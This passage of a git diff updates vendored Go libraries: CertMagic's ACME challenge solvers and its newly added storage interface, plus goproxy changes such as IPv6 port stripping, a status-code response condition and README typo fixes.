// names to ensure that challenges for the same ACME
|
||||
// DNS name do not overlap; for example, the TXT record
|
||||
// to make for both example.com and *.example.com are
|
||||
// the same; thus we cannot solve them concurrently.
|
||||
var activeDNSChallenges = newMapMutex()
|
||||
|
||||
// mapMutex implements named mutexes.
|
||||
type mapMutex struct {
|
||||
cond *sync.Cond
|
||||
set map[interface{}]struct{}
|
||||
}
|
||||
|
||||
func newMapMutex() *mapMutex {
|
||||
return &mapMutex{
|
||||
cond: sync.NewCond(new(sync.Mutex)),
|
||||
set: make(map[interface{}]struct{}),
|
||||
}
|
||||
}
|
||||
|
||||
func (mmu *mapMutex) Lock(key interface{}) {
|
||||
mmu.cond.L.Lock()
|
||||
defer mmu.cond.L.Unlock()
|
||||
for mmu.locked(key) {
|
||||
mmu.cond.Wait()
|
||||
}
|
||||
mmu.set[key] = struct{}{}
|
||||
}
|
||||
|
||||
func (mmu *mapMutex) Unlock(key interface{}) {
|
||||
mmu.cond.L.Lock()
|
||||
defer mmu.cond.L.Unlock()
|
||||
delete(mmu.set, key)
|
||||
mmu.cond.Broadcast()
|
||||
}
|
||||
|
||||
func (mmu *mapMutex) locked(key interface{}) (ok bool) {
|
||||
_, ok = mmu.set[key]
|
||||
return
|
||||
}
|
||||
|
||||
// distributedSolver allows the ACME HTTP-01 and TLS-ALPN challenges
|
||||
// to be solved by an instance other than the one which initiated it.
|
||||
// This is useful behind load balancers or in other cluster/fleet
|
||||
// configurations. The only requirement is that the instance which
|
||||
// initiates the challenge shares the same storage and locker with
|
||||
// the others in the cluster. The storage backing the certificate
|
||||
// cache in distributedSolver.config is crucial.
|
||||
//
|
||||
// Obviously, the instance which completes the challenge must be
|
||||
// serving on the HTTPChallengePort for the HTTP-01 challenge or the
|
||||
// TLSALPNChallengePort for the TLS-ALPN-01 challenge (or have all
|
||||
// the packets port-forwarded) to receive and handle the request. The
|
||||
// server which receives the challenge must handle it by checking to
|
||||
// see if the challenge token exists in storage, and if so, decode it
|
||||
// and use it to serve up the correct response. HTTPChallengeHandler
|
||||
// in this package as well as the GetCertificate method implemented
|
||||
// by a Config support and even require this behavior.
|
||||
//
|
||||
// In short: the only two requirements for cluster operation are
|
||||
// sharing sync and storage, and using the facilities provided by
|
||||
// this package for solving the challenges.
|
||||
type distributedSolver struct {
|
||||
// The storage backing the distributed solver. It must be
|
||||
// the same storage configuration as what is solving the
|
||||
// challenge in order to be effective.
|
||||
storage Storage
|
||||
|
||||
// The storage key prefix, associated with the issuer
|
||||
// that is solving the challenge.
|
||||
storageKeyIssuerPrefix string
|
||||
|
||||
// Since the distributedSolver is only a
|
||||
// wrapper over an actual solver, place
|
||||
// the actual solver here.
|
||||
solver acmez.Solver
|
||||
}
|
||||
|
||||
// Present invokes the underlying solver's Present method
|
||||
// and also stores domain, token, and keyAuth to the storage
|
||||
// backing the certificate cache of dhs.acmeIssuer.
|
||||
func (dhs distributedSolver) Present(ctx context.Context, chal acme.Challenge) error {
|
||||
infoBytes, err := json.Marshal(chal)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
err = dhs.storage.Store(ctx, dhs.challengeTokensKey(challengeKey(chal)), infoBytes)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
|
||||
err = dhs.solver.Present(ctx, chal)
|
||||
if err != nil {
|
||||
return fmt.Errorf("presenting with embedded solver: %v", err)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// Wait wraps the underlying solver's Wait() method, if any. Implements acmez.Waiter.
|
||||
func (dhs distributedSolver) Wait(ctx context.Context, challenge acme.Challenge) error {
|
||||
if waiter, ok := dhs.solver.(acmez.Waiter); ok {
|
||||
return waiter.Wait(ctx, challenge)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// CleanUp invokes the underlying solver's CleanUp method
|
||||
// and also cleans up any assets saved to storage.
|
||||
func (dhs distributedSolver) CleanUp(ctx context.Context, chal acme.Challenge) error {
|
||||
err := dhs.storage.Delete(ctx, dhs.challengeTokensKey(challengeKey(chal)))
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
err = dhs.solver.CleanUp(ctx, chal)
|
||||
if err != nil {
|
||||
return fmt.Errorf("cleaning up embedded provider: %v", err)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// challengeTokensPrefix returns the key prefix for challenge info.
|
||||
func (dhs distributedSolver) challengeTokensPrefix() string {
|
||||
return path.Join(dhs.storageKeyIssuerPrefix, "challenge_tokens")
|
||||
}
|
||||
|
||||
// challengeTokensKey returns the key to use to store and access
|
||||
// challenge info for domain.
|
||||
func (dhs distributedSolver) challengeTokensKey(domain string) string {
|
||||
return path.Join(dhs.challengeTokensPrefix(), StorageKeys.Safe(domain)+".json")
|
||||
}
|
||||
|
||||
// solverInfo associates a listener with the
|
||||
// number of challenges currently using it.
|
||||
type solverInfo struct {
|
||||
closed int32 // accessed atomically
|
||||
count int
|
||||
listener net.Listener
|
||||
done chan struct{} // used to signal when our own solver server is done
|
||||
}
|
||||
|
||||
// getSolverInfo gets a valid solverInfo struct for address.
|
||||
func getSolverInfo(address string) *solverInfo {
|
||||
si, ok := solvers[address]
|
||||
if !ok {
|
||||
si = &solverInfo{done: make(chan struct{})}
|
||||
solvers[address] = si
|
||||
}
|
||||
return si
|
||||
}
|
||||
|
||||
// robustTryListen calls net.Listen for a TCP socket at addr.
|
||||
// This function may return both a nil listener and a nil error!
|
||||
// If it was able to bind the socket, it returns the listener
|
||||
// and no error. If it wasn't able to bind the socket because
|
||||
// the socket is already in use, then it returns a nil listener
|
||||
// and nil error. If it had any other error, it returns the
|
||||
// error. The intended error handling logic for this function
|
||||
// is to proceed if the returned listener is not nil; otherwise
|
||||
// return err (which may also be nil). In other words, this
|
||||
// function ignores errors if the socket is already in use,
|
||||
// which is useful for our challenge servers, where we assume
|
||||
// that whatever is already listening can solve the challenges.
|
||||
func robustTryListen(addr string) (net.Listener, error) {
|
||||
var listenErr error
|
||||
for i := 0; i < 2; i++ {
|
||||
// doesn't hurt to sleep briefly before the second
|
||||
// attempt in case the OS has timing issues
|
||||
if i > 0 {
|
||||
time.Sleep(100 * time.Millisecond)
|
||||
}
|
||||
|
||||
// if we can bind the socket right away, great!
|
||||
var ln net.Listener
|
||||
ln, listenErr = net.Listen("tcp", addr)
|
||||
if listenErr == nil {
|
||||
return ln, nil
|
||||
}
|
||||
|
||||
// if it failed just because the socket is already in use, we
|
||||
// have no choice but to assume that whatever is using the socket
|
||||
// can answer the challenge already, so we ignore the error
|
||||
connectErr := dialTCPSocket(addr)
|
||||
if connectErr == nil {
|
||||
return nil, nil
|
||||
}
|
||||
|
||||
// hmm, we couldn't connect to the socket, so something else must
|
||||
// be wrong, right? wrong!! we've had reports across multiple OSes
|
||||
// now that sometimes connections fail even though the OS told us
|
||||
// that the address was already in use; either the listener is
|
||||
// fluctuating between open and closed very, very quickly, or the
|
||||
// OS is inconsistent and contradicting itself; I have been unable
|
||||
// to reproduce this, so I'm now resorting to hard-coding substring
|
||||
// matching in error messages as a really hacky and unreliable
|
||||
// safeguard against this, until we can idenify exactly what was
|
||||
// happening; see the following threads for more info:
|
||||
// https://caddy.community/t/caddy-retry-error/7317
|
||||
// https://caddy.community/t/v2-upgrade-to-caddy2-failing-with-errors/7423
|
||||
if strings.Contains(listenErr.Error(), "address already in use") ||
|
||||
strings.Contains(listenErr.Error(), "one usage of each socket address") {
|
||||
log.Printf("[WARNING] OS reports a contradiction: %v - but we cannot connect to it, with this error: %v; continuing anyway 🤞 (I don't know what causes this... if you do, please help?)", listenErr, connectErr)
|
||||
return nil, nil
|
||||
}
|
||||
}
|
||||
return nil, fmt.Errorf("could not start listener for challenge server at %s: %v", addr, listenErr)
|
||||
}
|
||||
|
||||
// dialTCPSocket connects to a TCP address just for the sake of
|
||||
// seeing if it is open. It returns a nil error if a TCP connection
|
||||
// can successfully be made to addr within a short timeout.
|
||||
func dialTCPSocket(addr string) error {
|
||||
conn, err := net.DialTimeout("tcp", addr, 250*time.Millisecond)
|
||||
if err == nil {
|
||||
conn.Close()
|
||||
}
|
||||
return err
|
||||
}
|
||||
|
||||
// GetACMEChallenge returns an active ACME challenge for the given identifier,
|
||||
// or false if no active challenge for that identifier is known.
|
||||
func GetACMEChallenge(identifier string) (Challenge, bool) {
|
||||
activeChallengesMu.Lock()
|
||||
chalData, ok := activeChallenges[identifier]
|
||||
activeChallengesMu.Unlock()
|
||||
return chalData, ok
|
||||
}
|
||||
|
||||
// The active challenge solvers, keyed by listener address,
|
||||
// and protected by a mutex. Note that the creation of
|
||||
// solver listeners and the incrementing of their counts
|
||||
// are atomic operations guarded by this mutex.
|
||||
var (
|
||||
solvers = make(map[string]*solverInfo)
|
||||
solversMu sync.Mutex
|
||||
)
|
||||
|
||||
// activeChallenges holds information about all known, currently-active
|
||||
// ACME challenges, keyed by identifier. CertMagic guarantees that
|
||||
// challenges for the same identifier do not overlap, by its locking
|
||||
// mechanisms; thus if a challenge comes in for a certain identifier,
|
||||
// we can be confident that if this process initiated the challenge,
|
||||
// the correct information to solve it is in this map. (It may have
|
||||
// alternatively been initiated by another instance in a cluster, in
|
||||
// which case the distributed solver will take care of that.)
|
||||
var (
|
||||
activeChallenges = make(map[string]Challenge)
|
||||
activeChallengesMu sync.Mutex
|
||||
)
|
||||
|
||||
// Challenge is an ACME challenge, but optionally paired with
|
||||
// data that can make it easier or more efficient to solve.
|
||||
type Challenge struct {
|
||||
acme.Challenge
|
||||
data interface{}
|
||||
}
|
||||
|
||||
// challengeKey returns the map key for a given challenge; it is the identifier
|
||||
// unless it is an IP address using the TLS-ALPN challenge.
|
||||
func challengeKey(chal acme.Challenge) string {
|
||||
if chal.Type == acme.ChallengeTypeTLSALPN01 && chal.Identifier.Type == "ip" {
|
||||
reversed, err := dns.ReverseAddr(chal.Identifier.Value)
|
||||
if err == nil {
|
||||
return reversed[:len(reversed)-1] // strip off '.'
|
||||
}
|
||||
}
|
||||
return chal.Identifier.Value
|
||||
}
|
||||
|
||||
// solverWrapper should be used to wrap all challenge solvers so that
|
||||
// we can add the challenge info to memory; this makes challenges globally
|
||||
// solvable by a single HTTP or TLS server even if multiple servers with
|
||||
// different configurations/scopes need to get certificates.
|
||||
type solverWrapper struct{ acmez.Solver }
|
||||
|
||||
func (sw solverWrapper) Present(ctx context.Context, chal acme.Challenge) error {
|
||||
activeChallengesMu.Lock()
|
||||
activeChallenges[challengeKey(chal)] = Challenge{Challenge: chal}
|
||||
activeChallengesMu.Unlock()
|
||||
return sw.Solver.Present(ctx, chal)
|
||||
}
|
||||
|
||||
func (sw solverWrapper) Wait(ctx context.Context, chal acme.Challenge) error {
|
||||
if waiter, ok := sw.Solver.(acmez.Waiter); ok {
|
||||
return waiter.Wait(ctx, chal)
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
func (sw solverWrapper) CleanUp(ctx context.Context, chal acme.Challenge) error {
|
||||
activeChallengesMu.Lock()
|
||||
delete(activeChallenges, challengeKey(chal))
|
||||
activeChallengesMu.Unlock()
|
||||
return sw.Solver.CleanUp(ctx, chal)
|
||||
}
|
||||
|
||||
// Interface guards
|
||||
var (
|
||||
_ acmez.Solver = (*solverWrapper)(nil)
|
||||
_ acmez.Waiter = (*solverWrapper)(nil)
|
||||
_ acmez.Waiter = (*distributedSolver)(nil)
|
||||
)
|
280
vendor/github.com/caddyserver/certmagic/storage.go
generated
vendored
Normal file
280
vendor/github.com/caddyserver/certmagic/storage.go
generated
vendored
Normal file
@ -0,0 +1,280 @@
|
||||
// Copyright 2015 Matthew Holt
|
||||
//
|
||||
// Licensed under the Apache License, Version 2.0 (the "License");
|
||||
// you may not use this file except in compliance with the License.
|
||||
// You may obtain a copy of the License at
|
||||
//
|
||||
// http://www.apache.org/licenses/LICENSE-2.0
|
||||
//
|
||||
// Unless required by applicable law or agreed to in writing, software
|
||||
// distributed under the License is distributed on an "AS IS" BASIS,
|
||||
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
// See the License for the specific language governing permissions and
|
||||
// limitations under the License.
|
||||
|
||||
package certmagic
|
||||
|
||||
import (
|
||||
"context"
|
||||
"path"
|
||||
"regexp"
|
||||
"strings"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"go.uber.org/zap"
|
||||
)
|
||||
|
||||
// Storage is a type that implements a key-value store.
|
||||
// Keys are prefix-based, with forward slash '/' as separators
|
||||
// and without a leading slash.
|
||||
//
|
||||
// Processes running in a cluster will wish to use the
|
||||
// same Storage value (its implementation and configuration)
|
||||
// in order to share certificates and other TLS resources
|
||||
// with the cluster.
|
||||
//
|
||||
// The Load, Delete, List, and Stat methods should return
|
||||
// fs.ErrNotExist if the key does not exist.
|
||||
//
|
||||
// Implementations of Storage must be safe for concurrent use
|
||||
// and honor context cancellations.
|
||||
type Storage interface {
|
||||
// Locker provides atomic synchronization
|
||||
// operations, making Storage safe to share.
|
||||
Locker
|
||||
|
||||
// Store puts value at key.
|
||||
Store(ctx context.Context, key string, value []byte) error
|
||||
|
||||
// Load retrieves the value at key.
|
||||
Load(ctx context.Context, key string) ([]byte, error)
|
||||
|
||||
// Delete deletes key. An error should be
|
||||
// returned only if the key still exists
|
||||
// when the method returns.
|
||||
Delete(ctx context.Context, key string) error
|
||||
|
||||
// Exists returns true if the key exists
|
||||
// and there was no error checking.
|
||||
Exists(ctx context.Context, key string) bool
|
||||
|
||||
// List returns all keys that match prefix.
|
||||
// If recursive is true, non-terminal keys
|
||||
// will be enumerated (i.e. "directories"
|
||||
// should be walked); otherwise, only keys
|
||||
// prefixed exactly by prefix will be listed.
|
||||
List(ctx context.Context, prefix string, recursive bool) ([]string, error)
|
||||
|
||||
// Stat returns information about key.
|
||||
Stat(ctx context.Context, key string) (KeyInfo, error)
|
||||
}
|
||||
|
||||
// Locker facilitates synchronization of certificate tasks across
|
||||
// machines and networks.
|
||||
type Locker interface {
|
||||
// Lock acquires the lock for key, blocking until the lock
|
||||
// can be obtained or an error is returned. Note that, even
|
||||
// after acquiring a lock, an idempotent operation may have
|
||||
// already been performed by another process that acquired
|
||||
// the lock before - so always check to make sure idempotent
|
||||
// operations still need to be performed after acquiring the
|
||||
// lock.
|
||||
//
|
||||
// The actual implementation of obtaining of a lock must be
|
||||
// an atomic operation so that multiple Lock calls at the
|
||||
// same time always results in only one caller receiving the
|
||||
// lock at any given time.
|
||||
//
|
||||
// To prevent deadlocks, all implementations (where this concern
|
||||
// is relevant) should put a reasonable expiration on the lock in
|
||||
// case Unlock is unable to be called due to some sort of network
|
||||
// failure or system crash. Additionally, implementations should
|
||||
// honor context cancellation as much as possible (in case the
|
||||
// caller wishes to give up and free resources before the lock
|
||||
// can be obtained).
|
||||
Lock(ctx context.Context, key string) error
|
||||
|
||||
// Unlock releases the lock for key. This method must ONLY be
|
||||
// called after a successful call to Lock, and only after the
|
||||
// critical section is finished, even if it errored or timed
|
||||
// out. Unlock cleans up any resources allocated during Lock.
|
||||
Unlock(ctx context.Context, key string) error
|
||||
}
|
||||
|
||||
// KeyInfo holds information about a key in storage.
|
||||
// Key and IsTerminal are required; Modified and Size
|
||||
// are optional if the storage implementation is not
|
||||
// able to get that information. Setting them will
|
||||
// make certain operations more consistent or
|
||||
// predictable, but it is not crucial to basic
|
||||
// functionality.
|
||||
type KeyInfo struct {
|
||||
Key string
|
||||
Modified time.Time
|
||||
Size int64
|
||||
IsTerminal bool // false for keys that only contain other keys (like directories)
|
||||
}
|
||||
|
||||
// storeTx stores all the values or none at all.
|
||||
func storeTx(ctx context.Context, s Storage, all []keyValue) error {
|
||||
for i, kv := range all {
|
||||
err := s.Store(ctx, kv.key, kv.value)
|
||||
if err != nil {
|
||||
for j := i - 1; j >= 0; j-- {
|
||||
s.Delete(ctx, all[j].key)
|
||||
}
|
||||
return err
|
||||
}
|
||||
}
|
||||
return nil
|
||||
}
|
||||
|
||||
// keyValue pairs a key and a value.
|
||||
type keyValue struct {
|
||||
key string
|
||||
value []byte
|
||||
}
|
||||
|
||||
// KeyBuilder provides a namespace for methods that
|
||||
// build keys and key prefixes, for addressing items
|
||||
// in a Storage implementation.
|
||||
type KeyBuilder struct{}
|
||||
|
||||
// CertsPrefix returns the storage key prefix for
|
||||
// the given certificate issuer.
|
||||
func (keys KeyBuilder) CertsPrefix(issuerKey string) string {
|
||||
return path.Join(prefixCerts, keys.Safe(issuerKey))
|
||||
}
|
||||
|
||||
// CertsSitePrefix returns a key prefix for items associated with
|
||||
// the site given by domain using the given issuer key.
|
||||
func (keys KeyBuilder) CertsSitePrefix(issuerKey, domain string) string {
|
||||
return path.Join(keys.CertsPrefix(issuerKey), keys.Safe(domain))
|
||||
}
|
||||
|
||||
// SiteCert returns the path to the certificate file for domain
|
||||
// that is associated with the issuer with the given issuerKey.
|
||||
func (keys KeyBuilder) SiteCert(issuerKey, domain string) string {
|
||||
safeDomain := keys.Safe(domain)
|
||||
return path.Join(keys.CertsSitePrefix(issuerKey, domain), safeDomain+".crt")
|
||||
}
|
||||
|
||||
// SitePrivateKey returns the path to the private key file for domain
|
||||
// that is associated with the certificate from the given issuer with
|
||||
// the given issuerKey.
|
||||
func (keys KeyBuilder) SitePrivateKey(issuerKey, domain string) string {
|
||||
safeDomain := keys.Safe(domain)
|
||||
return path.Join(keys.CertsSitePrefix(issuerKey, domain), safeDomain+".key")
|
||||
}
|
||||
|
||||
// SiteMeta returns the path to the metadata file for domain that
|
||||
// is associated with the certificate from the given issuer with
|
||||
// the given issuerKey.
|
||||
func (keys KeyBuilder) SiteMeta(issuerKey, domain string) string {
|
||||
safeDomain := keys.Safe(domain)
|
||||
return path.Join(keys.CertsSitePrefix(issuerKey, domain), safeDomain+".json")
|
||||
}
|
||||
|
||||
// OCSPStaple returns a key for the OCSP staple associated
|
||||
// with the given certificate. If you have the PEM bundle
|
||||
// handy, pass that in to save an extra encoding step.
|
||||
func (keys KeyBuilder) OCSPStaple(cert *Certificate, pemBundle []byte) string {
|
||||
var ocspFileName string
|
||||
if len(cert.Names) > 0 {
|
||||
firstName := keys.Safe(cert.Names[0])
|
||||
ocspFileName = firstName + "-"
|
||||
}
|
||||
ocspFileName += fastHash(pemBundle)
|
||||
return path.Join(prefixOCSP, ocspFileName)
|
||||
}
|
||||
|
||||
// Safe standardizes and sanitizes str for use as
|
||||
// a single component of a storage key. This method
|
||||
// is idempotent.
|
||||
func (keys KeyBuilder) Safe(str string) string {
|
||||
str = strings.ToLower(str)
|
||||
str = strings.TrimSpace(str)
|
||||
|
||||
// replace a few specific characters
|
||||
repl := strings.NewReplacer(
|
||||
" ", "_",
|
||||
"+", "_plus_",
|
||||
"*", "wildcard_",
|
||||
":", "-",
|
||||
"..", "", // prevent directory traversal (regex allows single dots)
|
||||
)
|
||||
str = repl.Replace(str)
|
||||
|
||||
// finally remove all non-word characters
|
||||
return safeKeyRE.ReplaceAllLiteralString(str, "")
|
||||
}
|
||||
|
||||
// CleanUpOwnLocks immediately cleans up all
|
||||
// current locks obtained by this process. Since
|
||||
// this does not cancel the operations that
|
||||
// the locks are synchronizing, this should be
|
||||
// called only immediately before process exit.
|
||||
// Errors are only reported if a logger is given.
|
||||
func CleanUpOwnLocks(ctx context.Context, logger *zap.Logger) {
|
||||
locksMu.Lock()
|
||||
defer locksMu.Unlock()
|
||||
for lockKey, storage := range locks {
|
||||
err := storage.Unlock(ctx, lockKey)
|
||||
if err == nil {
|
||||
delete(locks, lockKey)
|
||||
} else if logger != nil {
|
||||
logger.Error("unable to clean up lock in storage backend",
|
||||
zap.Any("storage", storage),
|
||||
zap.String("lock_key", lockKey),
|
||||
zap.Error(err),
|
||||
)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func acquireLock(ctx context.Context, storage Storage, lockKey string) error {
|
||||
err := storage.Lock(ctx, lockKey)
|
||||
if err == nil {
|
||||
locksMu.Lock()
|
||||
locks[lockKey] = storage
|
||||
locksMu.Unlock()
|
||||
}
|
||||
return err
|
||||
}
|
||||
|
||||
func releaseLock(ctx context.Context, storage Storage, lockKey string) error {
|
||||
err := storage.Unlock(ctx, lockKey)
|
||||
if err == nil {
|
||||
locksMu.Lock()
|
||||
delete(locks, lockKey)
|
||||
locksMu.Unlock()
|
||||
}
|
||||
return err
|
||||
}
|
||||
|
||||
// locks stores a reference to all the current
|
||||
// locks obtained by this process.
|
||||
var locks = make(map[string]Storage)
|
||||
var locksMu sync.Mutex
|
||||
|
||||
// StorageKeys provides methods for accessing
|
||||
// keys and key prefixes for items in a Storage.
|
||||
// Typically, you will not need to use this
|
||||
// because accessing storage is abstracted away
|
||||
// for most cases. Only use this if you need to
|
||||
// directly access TLS assets in your application.
|
||||
var StorageKeys KeyBuilder
|
||||
|
||||
const (
|
||||
prefixCerts = "certificates"
|
||||
prefixOCSP = "ocsp"
|
||||
)
|
||||
|
||||
// safeKeyRE matches any undesirable characters in storage keys.
|
||||
// Note that this allows dots, so you'll have to strip ".." manually.
|
||||
var safeKeyRE = regexp.MustCompile(`[^\w@.-]`)
|
||||
|
||||
// defaultFileStorage is a convenient, default storage
|
||||
// implementation using the local file system.
|
||||
var defaultFileStorage = &FileStorage{Path: dataDir()}
|
3
vendor/github.com/cenkalti/backoff/v3/go.mod
generated
vendored
3
vendor/github.com/cenkalti/backoff/v3/go.mod
generated
vendored
@ -1,3 +0,0 @@
|
||||
module github.com/cenkalti/backoff/v3
|
||||
|
||||
go 1.12
|
7
vendor/github.com/elazarl/goproxy/README.md
generated
vendored
7
vendor/github.com/elazarl/goproxy/README.md
generated
vendored
@ -2,6 +2,7 @@
|
||||
|
||||
[](https://godoc.org/github.com/elazarl/goproxy)
|
||||
[](https://gitter.im/elazarl/goproxy?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)
|
||||

|
||||
|
||||
Package goproxy provides a customizable HTTP proxy library for Go (golang),
|
||||
|
||||
@ -96,7 +97,7 @@ a `ReqCondition` accepting only requests directed to "www.reddit.com".
|
||||
|
||||
`DoFunc` will receive a function that will preprocess the request. We can change the request, or
|
||||
return a response. If the time is between 8:00am and 17:00pm, we will reject the request, and
|
||||
return a precanned text response saying "do not waste your time".
|
||||
return a pre-canned text response saying "do not waste your time".
|
||||
|
||||
See additional examples in the examples directory.
|
||||
|
||||
@ -135,12 +136,12 @@ For example:
|
||||
|
||||
```go
|
||||
// This rejects the HTTPS request to *.reddit.com during HTTP CONNECT phase
|
||||
proxy.OnRequest(goproxy.ReqHostMatches(regexp.MustCompile("reddit.*:443$"))).HandleConnect(goproxy.RejectConnect)
|
||||
proxy.OnRequest(goproxy.ReqHostMatches(regexp.MustCompile("reddit.*:443$"))).HandleConnect(goproxy.AlwaysReject)
|
||||
|
||||
// This will NOT reject the HTTPS request with URL ending with gif, due to the fact that proxy
|
||||
// only got the URL.Hostname and URL.Port during the HTTP CONNECT phase if the scheme is HTTPS, which is
|
||||
// quiet common these days.
|
||||
proxy.OnRequest(goproxy.UrlMatches(regexp.MustCompile(`.*gif$`))).HandleConnect(goproxy.RejectConnect)
|
||||
proxy.OnRequest(goproxy.UrlMatches(regexp.MustCompile(`.*gif$`))).HandleConnect(goproxy.AlwaysReject)
|
||||
|
||||
// The correct way to manipulate the HTTP request using URL.Path as condition is:
|
||||
proxy.OnRequest(goproxy.UrlMatches(regexp.MustCompile(`.*gif$`))).Do(YourReqHandlerFunc())
|
||||
|
8
vendor/github.com/elazarl/goproxy/ctx.go
generated
vendored
8
vendor/github.com/elazarl/goproxy/ctx.go
generated
vendored
@ -22,7 +22,7 @@ type ProxyCtx struct {
|
||||
// Will connect a request to a response
|
||||
Session int64
|
||||
certStore CertStorage
|
||||
proxy *ProxyHttpServer
|
||||
Proxy *ProxyHttpServer
|
||||
}
|
||||
|
||||
type RoundTripper interface {
|
||||
@ -43,11 +43,11 @@ func (ctx *ProxyCtx) RoundTrip(req *http.Request) (*http.Response, error) {
|
||||
if ctx.RoundTripper != nil {
|
||||
return ctx.RoundTripper.RoundTrip(req, ctx)
|
||||
}
|
||||
return ctx.proxy.Tr.RoundTrip(req)
|
||||
return ctx.Proxy.Tr.RoundTrip(req)
|
||||
}
|
||||
|
||||
func (ctx *ProxyCtx) printf(msg string, argv ...interface{}) {
|
||||
ctx.proxy.Logger.Printf("[%03d] "+msg+"\n", append([]interface{}{ctx.Session & 0xFF}, argv...)...)
|
||||
ctx.Proxy.Logger.Printf("[%03d] "+msg+"\n", append([]interface{}{ctx.Session & 0xFF}, argv...)...)
|
||||
}
|
||||
|
||||
// Logf prints a message to the proxy's log. Should be used in a ProxyHttpServer's filter
|
||||
@ -59,7 +59,7 @@ func (ctx *ProxyCtx) printf(msg string, argv ...interface{}) {
|
||||
// return r, nil
|
||||
// })
|
||||
func (ctx *ProxyCtx) Logf(msg string, argv ...interface{}) {
|
||||
if ctx.proxy.Verbose {
|
||||
if ctx.Proxy.Verbose {
|
||||
ctx.printf("INFO: "+msg, argv...)
|
||||
}
|
||||
}
|
||||
|
16
vendor/github.com/elazarl/goproxy/dispatcher.go
generated
vendored
16
vendor/github.com/elazarl/goproxy/dispatcher.go
generated
vendored
@ -161,6 +161,22 @@ func ContentTypeIs(typ string, types ...string) RespCondition {
|
||||
})
|
||||
}
|
||||
|
||||
// StatusCodeIs returns a RespCondition, testing whether or not the HTTP status
|
||||
// code is one of the given ints
|
||||
func StatusCodeIs(codes ...int) RespCondition {
|
||||
codeSet := make(map[int]bool)
|
||||
for _, c := range codes {
|
||||
codeSet[c] = true
|
||||
}
|
||||
return RespConditionFunc(func(resp *http.Response, ctx *ProxyCtx) bool {
|
||||
if resp == nil {
|
||||
return false
|
||||
}
|
||||
_, codeMatch := codeSet[resp.StatusCode]
|
||||
return codeMatch
|
||||
})
|
||||
}
|
||||
|
||||
// ProxyHttpServer.OnRequest Will return a temporary ReqProxyConds struct, aggregating the given condtions.
|
||||
// You will use the ReqProxyConds struct to register a ReqHandler, that would filter
|
||||
// the request, only if all the given ReqCondition matched.
|
||||
|
4
vendor/github.com/elazarl/goproxy/doc.go
generated
vendored
4
vendor/github.com/elazarl/goproxy/doc.go
generated
vendored
@ -3,7 +3,7 @@ Package goproxy provides a customizable HTTP proxy,
|
||||
supporting hijacking HTTPS connection.
|
||||
|
||||
The intent of the proxy, is to be usable with reasonable amount of traffic
|
||||
yet, customizable and programable.
|
||||
yet, customizable and programmable.
|
||||
|
||||
The proxy itself is simply an `net/http` handler.
|
||||
|
||||
@ -63,7 +63,7 @@ Finally, we have convenience function to throw a quick response
|
||||
return goproxy.NewResponse(ctx.Req, goproxy.ContentTypeText, http.StatusForbidden, "Can't see response with X-GoProxy header!")
|
||||
})
|
||||
|
||||
we close the body of the original repsonse, and return a new 403 response with a short message.
|
||||
we close the body of the original response, and return a new 403 response with a short message.
|
||||
|
||||
Example use cases:
|
||||
|
||||
|
3
vendor/github.com/elazarl/goproxy/go.mod
generated
vendored
3
vendor/github.com/elazarl/goproxy/go.mod
generated
vendored
@ -1,3 +0,0 @@
|
||||
module github.com/elazarl/goproxy
|
||||
|
||||
require github.com/elazarl/goproxy/ext v0.0.0-20190711103511-473e67f1d7d2
|
3
vendor/github.com/elazarl/goproxy/go.sum
generated
vendored
3
vendor/github.com/elazarl/goproxy/go.sum
generated
vendored
@ -1,3 +0,0 @@
|
||||
github.com/elazarl/goproxy/ext v0.0.0-20190711103511-473e67f1d7d2 h1:dWB6v3RcOy03t/bUadywsbyrQwCqZeNIEX6M1OtSZOM=
|
||||
github.com/elazarl/goproxy/ext v0.0.0-20190711103511-473e67f1d7d2/go.mod h1:gNh8nYJoAm43RfaxurUnxr+N1PwuFV3ZMl/efxlIlY8=
|
||||
github.com/rogpeppe/go-charset v0.0.0-20180617210344-2471d30d28b4/go.mod h1:qgYeAmZ5ZIpBWTGllZSQnw97Dj+woV0toclVaRGI8pc=
|
101
vendor/github.com/elazarl/goproxy/https.go
generated
vendored
101
vendor/github.com/elazarl/goproxy/https.go
generated
vendored
@ -36,6 +36,10 @@ var (
|
||||
httpsRegexp = regexp.MustCompile(`^https:\/\/`)
|
||||
)
|
||||
|
||||
// ConnectAction enables the caller to override the standard connect flow.
|
||||
// When Action is ConnectHijack, it is up to the implementer to send the
|
||||
// HTTP 200, or any other valid http response back to the client from within the
|
||||
// Hijack func
|
||||
type ConnectAction struct {
|
||||
Action ConnectActionLiteral
|
||||
Hijack func(req *http.Request, client net.Conn, ctx *ProxyCtx)
|
||||
@ -43,9 +47,25 @@ type ConnectAction struct {
|
||||
}
|
||||
|
||||
func stripPort(s string) string {
|
||||
ix := strings.IndexRune(s, ':')
|
||||
if ix == -1 {
|
||||
return s
|
||||
var ix int
|
||||
if strings.Contains(s, "[") && strings.Contains(s, "]") {
|
||||
//ipv6 : for example : [2606:4700:4700::1111]:443
|
||||
|
||||
//strip '[' and ']'
|
||||
s = strings.ReplaceAll(s, "[", "")
|
||||
s = strings.ReplaceAll(s, "]", "")
|
||||
|
||||
ix = strings.LastIndexAny(s, ":")
|
||||
if ix == -1 {
|
||||
return s
|
||||
}
|
||||
} else {
|
||||
//ipv4
|
||||
ix = strings.IndexRune(s, ':')
|
||||
if ix == -1 {
|
||||
return s
|
||||
}
|
||||
|
||||
}
|
||||
return s[:ix]
|
||||
}
|
||||
@ -64,8 +84,16 @@ func (proxy *ProxyHttpServer) connectDial(network, addr string) (c net.Conn, err
|
||||
return proxy.ConnectDial(network, addr)
|
||||
}
|
||||
|
||||
type halfClosable interface {
|
||||
net.Conn
|
||||
CloseWrite() error
|
||||
CloseRead() error
|
||||
}
|
||||
|
||||
var _ halfClosable = (*net.TCPConn)(nil)
|
||||
|
||||
